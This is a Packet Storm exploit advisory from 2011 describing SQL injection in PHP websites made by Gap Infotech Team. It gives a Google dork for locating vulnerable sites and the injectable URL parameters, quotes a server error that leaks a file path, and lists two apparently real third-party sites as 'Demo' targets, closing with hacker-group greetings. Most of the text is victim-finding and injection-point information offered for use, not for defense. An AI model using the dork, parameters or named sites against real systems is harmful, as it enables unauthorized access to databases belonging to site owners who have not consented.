Gap Infotech Team SQL Injection

2011-09-19T00:00:00
ID PACKETSTORM:105206
Type packetstorm
Reporter nGa Sa Lu
Modified 2011-09-19T00:00:00

Description

                                        
                                            ` _________________________________________________________  
#   
# Exploit Title: Gap Infotech Team SQL Injection Vulnerability   
# -[Google Dork]-: "Powered by: Gap Infotech Team"   
# Date: 2011-18-09   
# Author: nGa Sa Lu [ GaNgst3r ]   
# Service Link: http://www.gapinfotech.com   
# Tested on: Vista  
# Platform : php   
# ________________________________________________________   
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
>> Google Dork : "Powered by: Gap Infotech Team" >>  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
------------------------------------------------------------------------------------------------  
http://localhost.com/detail.php?id=[SQL]  
http://localhost.com/news/pdetail.php?d=[SQL]  
------------------------------------------------------------------------------------------------  
  
# SQL Error Statement  
------------------------  
Warning: Wrong parameter count for mysql_query() in /home/content/15/6527915/html/newresidentialprojectsingurgaon/detail.php on line 114  
  
# Demo  
---------  
http://newresidentialprojectsingurgaon.in/detail.php?id=54  
http://anjum.co.in/news/pdetail.php?d=63  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
>> Greetz to all M1rT crew, h4ckall[dot]net, 4lbora4q[dot]com bros >>>  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
.>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
>> [ dongoth ] >> [ GaNgst3r ] >> [ nGa Sa Lu ] >> m3 :>>>>>>>>>  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
`